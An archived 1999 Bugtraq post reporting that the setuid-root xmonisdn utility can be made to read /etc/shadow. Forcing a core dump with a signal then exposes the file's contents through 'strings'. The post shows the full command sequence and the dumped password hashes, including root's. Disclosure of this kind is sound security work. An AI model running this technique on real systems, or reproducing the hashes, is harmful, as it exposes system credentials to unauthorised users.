Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1999-q3

Bugtraq Archives: xmonisdn (isdn4k-utils/Linux) bug report

xmonisdn (isdn4k-utils/Linux) bug report

Ron van Daal (ronvdaalSYNTONIC.NET)
Tue, 19 Oct 1999 02:44:04 +0200

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Next message: Shivdasani, Meenoo: "Re: Gauntlet 5.0 BSDI warning"
Previous message: Matt Chapman: "Re: execve bug linux-2.2.12"
Next in thread: Jan-Hendrik Terstegge: "Re: xmonisdn (isdn4k-utils/Linux) bug report"
Reply: Jan-Hendrik Terstegge: "Re: xmonisdn (isdn4k-utils/Linux) bug report"
Reply: Aviram Jenik: "DoS in Eicon ISDN Modem is now fixed"

Hello,

While playing with xmonisdn (included in the isdn4k-utils package),
I discovered a little bug. I didn't find anything regarding xmonisdn
in the Bugtraq archives, so here's a quick post.

I'm wondering if other xmonisdn users can reproduce this exploit.
(Tested on my workstation, which is running Red Hat Linux 6.0)

[[syntonixdamien bin]# pwd; ls -al xmonisdn
/usr/bin
-rwsr-xr-x 1 root root 13528 Mar 4 1998 xmonisdn
[[syntonixdamien bin]# xmonisdn -file /etc/shadow
Warning: Cannot convert string "netactive" to type Pixmap
Warning: Cannot convert string "netactiveout" to type Pixmap
Warning: Cannot convert string "netwaiting" to type Pixmap
Warning: Cannot convert string "netinactive" to type Pixmap
Warning: Cannot convert string "netstart" to type Pixmap
Warning: Cannot convert string "netstop" to type Pixmap

[1]+ Stopped xmonisdn -file /etc/shadow
[[syntonixdamien bin]# bg
[1]+ xmonisdn -file /etc/shadow &
[[syntonixdamien bin]# killall -8 xmonisdn
[1]+ Floating point exception(core dumped) xmonisdn -file /etc/shadow
[[syntonixdamien bin]# strings core|less

<snip>
/lib/ld-linux.so.2
root:$1$Fijz9O0n$ku/VSK.h6cbTV5oueAAwz/:10883:0:99999:7:-1:-1:134538500
bin:*:10878:0:99999:7:::
daemon:*:10878:0:99999:7:::
adm:*:10878:0:99999:7:::
lp:*:10878:0:99999:7:::
sync:*:10878:0:99999:7:::
shutdown:*:10878:0:99999:7:::
halt:*:10878:0:99999:7:::
mail:*:10878:0:99999:7:::
news:*:10878:0:99999:7:::
uucp:*:10878:0:99999:7:::
operator:*:10878:0:99999:7:::
games:*:10878:0:99999:7:::
gopher:*:10878:0:99999:7:::
ftp:*:10878:0:99999:7:::
nobody:*:10878:0:99999:7:::
xfs:!!:10878:0:99999:7:::
ronvdaal:$1$Dc92cqLj$V/HSANaVuwCMxGjFfZC/T0:10883:0:99999:7:-1:-1:134538492
syntonix:$1$h3yIM.h/$JjBLYPvb4Zcjv1tb.21Uw/:10883:0:99999:7:-1:-1:134538484
<snip>

--
Ron van Daal          | Syntonic Internet | tel. +31(0)46-4230738
ronvdaalsyntonic.net | www.syntonic.net  | fax. +31(0)46-4230739

Next message: Shivdasani, Meenoo: "Re: Gauntlet 5.0 BSDI warning"
Previous message: Matt Chapman: "Re: execve bug linux-2.2.12"
Next in thread: Jan-Hendrik Terstegge: "Re: xmonisdn (isdn4k-utils/Linux) bug report"
Reply: Jan-Hendrik Terstegge: "Re: xmonisdn (isdn4k-utils/Linux) bug report"
Reply: Aviram Jenik: "DoS in Eicon ISDN Modem is now fixed"

This archive was generated by hypermail 2.0b3 on Tue Oct 19 1999 - 14:16:12 CDT